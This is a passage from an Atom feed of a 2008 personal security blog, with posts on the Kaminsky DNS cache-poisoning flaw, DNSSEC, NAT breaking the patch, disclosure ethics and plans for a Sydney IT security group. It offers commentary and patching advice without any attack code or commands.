term='ssig'/><category scheme='http://www.blogger.com/atom/ns#' term='Jeff'/><category scheme='http://www.blogger.com/atom/ns#' term='Sydney'/><title type='text'>Sydney IT Security Group</title><content type='html'>So I had a chat with &lt;a href="http://blogs.technet.com/jeffa36/"&gt;Jeff&lt;/a&gt; about starting up a security group in Sydney similar to counterparts in &lt;a href="http://www.aususergroups.org/security"&gt;Canberra&lt;/a&gt;, &lt;a href="http://www.aususergroups.com/miag"&gt;Melbourne&lt;/a&gt;, and &lt;a href="http://www.aususergroups.org/big"&gt;Brisbane.&lt;/a&gt;&lt;br /&gt;It is really a great opportunity and I have been looking for a security group in Sydney for years now, making do with going to security topics at other groups. I don't think it will detract from these other groups, just expand on the security theme, going places other groups may not want to go as they are too focussed.&lt;br /&gt;I'd like to get some comments here on what people would like to see and what night etc., but people rarely comment on my blog. 
So I will set up a site for the group shortly and we can duke it out there.&lt;br /&gt;Peace out all.</content><link rel='replies' type='application/atom+xml' href='http://security.morganstorey.com/feeds/6243120274056678338/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7184718389860127472&amp;postID=6243120274056678338' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/6243120274056678338'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/6243120274056678338'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/2008/09/sydney-it-security-group.html' title='Sydney IT Security Group'/><author><name>Morgan</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://2.bp.blogspot.com/_7O2G1AsI61Y/SJ-eXmjSizI/AAAAAAAAAAU/Z8WzHydqscg/s1600-R/Calvin.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7184718389860127472.post-8033972713450373218</id><published>2008-08-27T18:00:00.000+10:00</published><updated>2008-11-16T16:03:46.639+11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DNS'/><category scheme='http://www.blogger.com/atom/ns#' term='kaminsky'/><title type='text'>Pretty lights</title><content type='html'>More on DNS, I know. May as well be another person beating a dead horse. But I give you pretty: &lt;a href="http://www.doxpara.com/?p=1206"&gt;http://www.doxpara.com/?p=1206&lt;/a&gt;&lt;br /&gt;It is a video of the patched and not patched worldwide. 
It intrigues me that there is a blinking light on the map of Australia about 3 hours north of Adelaide; I doubt it is Alice Springs, too far south, maybe Coober Pedy if my geography serves.&lt;br /&gt;Onto some more supposition by me (mainly in reply to Dan [the guy who discovered and researched the DNS flaw] &lt;a href="http://www.doxpara.com/?p=1215"&gt;here&lt;/a&gt;);&lt;br /&gt;I agree with what has been said, that we need more security on an inherently insecure network. But some (perceived) anonymity and some plain text is good, and what the internet is all about.&lt;br /&gt;Could you imagine every site moving to https? For starters, what is the point, who needs to read my blog through an encrypted channel? Really, why? I don't really have any direct post functionality, and only a handful of readers; it is not like I am directing them to blindly do anything either.&lt;br /&gt;Onto DNS, I was thinking the other day of another way to fix the issue. Deploy a port knocking technique on the reply based on the query, so that ports would have to be knocked in the correct order on the DNS server before accepting the lookup back. Similar to the way a person gets into a safe: knowing the numbers isn't good enough, you need to know the sequence. This would stop NAT being an issue as the DNS server can make the request out on all ports, getting an auto map back on these ports. 
And it would be more secure as the attacker would have to guess the right ports to knock on the way back, or read the request and then generate the reply and reply back, but if they can do that they are already in the middle and the game is over.&lt;br /&gt;What do you think?&lt;br /&gt;Peace out all, especially Dan, good job.</content><link rel='replies' type='application/atom+xml' href='http://security.morganstorey.com/feeds/8033972713450373218/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7184718389860127472&amp;postID=8033972713450373218' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/8033972713450373218'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/8033972713450373218'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/2008/11/pretty-lights.html' title='Pretty lights'/><author><name>Morgan</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://2.bp.blogspot.com/_7O2G1AsI61Y/SJ-eXmjSizI/AAAAAAAAAAU/Z8WzHydqscg/s1600-R/Calvin.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7184718389860127472.post-983344930414342531</id><published>2008-08-14T18:54:00.000+10:00</published><updated>2008-11-16T15:59:37.898+11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DNSSEC'/><category scheme='http://www.blogger.com/atom/ns#' term='DNS'/><category scheme='http://www.blogger.com/atom/ns#' term='kaminsky'/><title type='text'>DNS woes continue... 
sorta</title><content type='html'>So as I said, and the original discoverer Dan said, it was just a patch. Not a fix, not a be-all and end-all solution. A temporary patch. We already know some NAT devices break the patch's fix. But from the looks &lt;a href="http://tservice.net.ru/~s0mbre/blog/devel/networking/dns/2008_08_08.html"&gt;here&lt;/a&gt; and &lt;a href="http://www.nytimes.com/2008/08/09/technology/09flaw.html?_r=1&amp;oref=slogin"&gt;here&lt;/a&gt; it can be broken. The first link even details how, but there is a caveat: it is not easy, and a lot of bandwidth with low latency is required.&lt;br /&gt;The first article explains how they did it over GigE in 10 hours. Most DNS servers that are doing resolves for clients are probably not even on 20 Mbps of bandwidth, with latency 10+ times that of ethernet, not including the clients themselves causing some load. So you could say it would take 10+ times longer to do this over the internet, so 100 hours. Someone will hopefully notice at around hour 20… But it isn't that simple, what if some baddie hits a server with a mere 100 clients... (Most botnets are 10 times this size.) Chaos again. We need a better fix. I mentioned before some kind of signed DNS; I am the first to admit I have gaps in my knowledge as I had never heard of DNSSEC, but now that I have listened to the Blackhat talk I have heard about it. I had a quick look at &lt;a href="http://en.wikipedia.org/wiki/DNSSEC"&gt;wikipedia&lt;/a&gt; and the &lt;a href="http://www.dnssec.net/"&gt;official site&lt;/a&gt; and it is interesting. Of course Windows servers only support it as a secondary; also the glaring hole of non-NSEC3 servers allowing enumeration of sites is just plain silly. 
Seriously, just hash the user's requested domain "Not Found" and add it to the RFC, done.&lt;br /&gt;I think it should include the option for encrypting replies; may as well, it could be useful for higher-security organisations.&lt;br /&gt;This is a very real and very now threat, there are at least two pieces of software out there to attack it, one being the very good, but very newbie friendly &lt;a href="http://www.metaploit.com/"&gt;metasploit.&lt;/a&gt;&lt;br /&gt;Well I am pretty much just re-iterating and expanding on my comments on &lt;a href="http://www.darknet.org.uk/"&gt;darknet&lt;/a&gt; but there you go.</content><link rel='replies' type='application/atom+xml' href='http://security.morganstorey.com/feeds/983344930414342531/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7184718389860127472&amp;postID=983344930414342531' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/983344930414342531'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/983344930414342531'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/2008/08/dns-woes-continue-sorta.html' title='DNS woes continue... 
sorta'/><author><name>Morgan</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://2.bp.blogspot.com/_7O2G1AsI61Y/SJ-eXmjSizI/AAAAAAAAAAU/Z8WzHydqscg/s1600-R/Calvin.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7184718389860127472.post-1749058411549554498</id><published>2008-07-25T19:48:00.000+10:00</published><updated>2008-11-16T15:51:14.698+11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DNS'/><category scheme='http://www.blogger.com/atom/ns#' term='kaminsky'/><title type='text'>DNS Vulnerability...again</title><content type='html'>There has been some speculation and even backlash on the internet about the recent DNS vulnerability; I posted about it &lt;a href="http://www.morganstorey.com/2008/07/101-posts-yay.html"&gt;here.&lt;/a&gt; Interestingly &lt;a href="http://addxorrol.blogspot.com/2008/07/on-dans-request-for-no-speculation.html"&gt;some people&lt;/a&gt; are saying that the vulnerability should have been disclosed when discovered.&lt;br /&gt;This is plain silly. To put it in simple terms with a car analogy (I love car analogies): say a safety tester discovers that every single Toyota Corolla on the market (the number one selling car, 35 million worldwide) bursts into flames (props to Fight Club; note: Corollas don't afaik) if you crash at exactly 35 kilometers per hour. If he just posts this on his blog a few things will happen: everyone will know in about two seconds. The next day 35 million Corolla owners will demand a refund, either destroying or severely damaging Toyota and its employees, and hooligans will wander around car parks with sledgehammers hoping to hit one at the lucky 35kph speed. 
Basically what I am saying in a rather confused and overly long analogy is that if this had been disclosed pre vendor patch release there would have been lost confidence in the whole internet; there would be lost jobs and money from the lost confidence alone. Then the real fun would begin: prior to the patch being released someone would write a script to take advantage of the vulnerability, this script would then be morphed into several GUI tools, and every script kiddie and his bot army would take down sites worldwide for fun and profit.&lt;br /&gt;I am not saying it would have been an internet dooms-day, it could have, but the internet is pretty robust. But it would have been very damaging had the vendor patch not been released; there would have been loss of income and loss of jobs.&lt;br /&gt;I agree with the way it was done, but maybe it could have been done a little sooner: if you do a Google search, DNS cache poisoning is not new in the slightest, have a look at the &lt;a href="http://en.wikipedia.org/wiki/DNS_cache_poisoning"&gt;wiki article.&lt;/a&gt; Birthday attacks are a common similar variant; I have even been involved with a cache poisoning issue a couple of times, first back in 2003. 
Both times I couldn't capture the culprit, there were just too many packets to wade through, but the problems were solved.&lt;br /&gt;I do agree with what I have now read, maybe we need to move across to some kind of signed DNS, either SSL DNS or some kind of signed cert, like gpg and its signed keys.&lt;br /&gt;We could set up the root servers all with a cert or signed key that all DNS servers are set to trust, just roll it into an update or new DNS installs then slowly cut over; then if you want to, say, use your ISP's servers as forwarders you could simply implicitly trust the key, or they could buy a signed cert (I can hear Verisign/Thawte licking their lips from here).&lt;br /&gt;Supposedly due to some disclosure there may be a script kiddie tool out soon to exploit this vulnerability, and with most NAT devices (see routers) turning patched servers into vulnerable ones and some of these routers not being patched/patchable it is only a matter of time. So everyone PATCH your servers please.</content><link rel='replies' type='application/atom+xml' href='http://security.morganstorey.com/feeds/1749058411549554498/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7184718389860127472&amp;postID=1749058411549554498' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/1749058411549554498'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/1749058411549554498'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/2008/07/dns-vulnerabilityagain.html' title='DNS 
Vulnerability...again'/><author><name>Morgan</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://2.bp.blogspot.com/_7O2G1AsI61Y/SJ-eXmjSizI/AAAAAAAAAAU/Z8WzHydqscg/s1600-R/Calvin.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7184718389860127472.post-5576874335064324207</id><published>2008-07-21T18:29:00.001+10:00</published><updated>2008-11-16T15:47:33.823+11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='NAT'/><category scheme='http://www.blogger.com/atom/ns#' term='DNS'/><category scheme='http://www.blogger.com/atom/ns#' term='kaminsky'/><category scheme='http://www.blogger.com/atom/ns#' term='darknet'/><category scheme='http://www.blogger.com/atom/ns#' term='team-cymru'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><title type='text'>Here be dragons</title><content type='html'>If you haven't seen this &lt;a href="http://xkcd.com/195/"&gt;yet&lt;/a&gt; have a look. Yes, the brilliant webcomic xkcd some time ago did a Map of the Internet; I used to have this posted on my wall at work so the newer employees could come have a look when they were visiting to ask a question, it really shows how immense it all is.&lt;br /&gt;But then while looking at one of my bookmarks on network security using &lt;a href="http://www.team-cymru.org/Services/darknets.html"&gt;darknets&lt;/a&gt; for a post on an internet forum I found this: &lt;a href="http://www.team-cymru.org/Monitoring/Malevolence/hilbert.html"&gt;a map of maliciousness.&lt;/a&gt; Awesome. It really is interesting to see the concentrations of either compromised machines or general evil-doers in the world. The thing that gets me, and got me when I first looked at it, was why does the 10.0.0.0 range have so many hits? It's a private range. Then I looked closer. Why are a few of the "bogon" address ranges getting hits? 
The only thing I can think is IP spoofing, and if so who would spoof a 10 address? Why not spoof 1.3.3.7 (fun) or something else, everyone knows 10 is internal... anyway post your thoughts.&lt;br /&gt;Oh yeah, we haven't quite won the DNS thing yet either. The multi-vendor patch was just that, a patch; there are still inherent flaws in the system. Like the new one disclosed with DNS that passes through NAT (see most DNS servers, as NAT means some decent IP sharing); it is annoying but it is a fight we have to keep on. See &lt;a href="http://taosecurity.blogspot.com/"&gt;here for the article.&lt;/a&gt; It is basically NAT routers being lazy and not letting the port be the random one that the DNS server wants it to be. This randomness doesn't make DNS invulnerable to the poisoning attack I mentioned earlier, it just makes it much, much harder. So to have some routers (people like Netgear don't release patches after it is 5+ years old) destroy the hard work must be really annoying.</content><link rel='replies' type='application/atom+xml' href='http://security.morganstorey.com/feeds/5576874335064324207/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7184718389860127472&amp;postID=5576874335064324207' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/5576874335064324207'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/5576874335064324207'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/2008/07/here-be-dragons.html' title='Here be dragons'/><author><name>Morgan</name><email>noreply@blogger.com</email><gd:image 
rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://2.bp.blogspot.com/_7O2G1AsI61Y/SJ-eXmjSizI/AAAAAAAAAAU/Z8WzHydqscg/s1600-R/Calvin.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7184718389860127472.post-7943821680126913965</id><published>2008-07-14T19:24:00.001+10:00</published><updated>2008-11-16T15:36:56.446+11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DNS'/><category scheme='http://www.blogger.com/atom/ns#' term='kaminsky'/><title type='text'>DNS vulnerabilities and Sydney IT Security Group.</title><content type='html'>As you may or may not have heard there was a big update released for basically the whole internet. See &lt;a href="http://www.kb.cert.org/vuls/id/800113"&gt;here&lt;/a&gt; and &lt;a href="http://doxpara.com/"&gt;here for a test of your own DNS.&lt;/a&gt;&lt;br /&gt;Basically it boils down to a bad guy being able to put incorrect entries into your ISP's or work's DNS cache that would point you to the wrong site. So instead of going to google.com it could take you to a hacker's version, or whatever. This would also affect email.&lt;br /&gt;Now this kind of thing does happen occasionally, but this was seen as such a big issue (it could basically destroy the internet if unchecked and unpatched) that CERT, who handles these issues, let all the vendors and developers know, giving them time to write a patch for release on the same day. Very, very impressive.&lt;br /&gt;Not only Microsoft but Unix, Linux, BSD, Cisco, Checkpoint, all of them released a patch for their varied DNS implementations. Yahoo, who uses an older *nix implementation of DNS, BIND 8, managed to simply commit to abandoning it in favour of the newer patched BIND 9.&lt;br /&gt;The question I put forward is: is this finally a time of security as an institution? Security how it should be done, globally. 
Sure it is still relying on admins at the other end, but with auto updates being the norm, it should be fine. This to me seems a step in the right direction, and I am sure even a couple of years ago this wouldn't have happened. Will this one day lead us to a security utopia free of vulnerabilities and insecurities? No. But it may lead to sharing and assistance cross-platform.&lt;br /&gt;Speaking of security, there is talk of an IT Security group being started up in Sydney, and I may be taking the reins. It will be sponsored by Microsoft, but if I take the reins I plan on being vendor neutral, albeit Microsoft has some nice claims to fame, and even with all their foibles and the hatred that is flung at them, they do try and do some stuff right. Operating systems are tools; you should use the right tool for the right job.</content><link rel='replies' type='application/atom+xml' href='http://security.morganstorey.com/feeds/7943821680126913965/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7184718389860127472&amp;postID=7943821680126913965' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/7943821680126913965'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7184718389860127472/posts/default/7943821680126913965'/><link rel='alternate' type='text/html' href='http://security.morganstorey.com/2008/07/dns-vulnerabilites-and-sydney-it.html' title='DNS vulnerabilities and Sydney IT Security Group.'/><author><name>Morgan</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' 
src='http://2.bp.blogspot.com/_7O2G1AsI61Y/SJ-eXmjSizI/AAAAAAAAAAU/Z8WzHydqscg/s1600-R/Calvin.jpg'/></author><thr:total>0</thr:total></entry></feed>
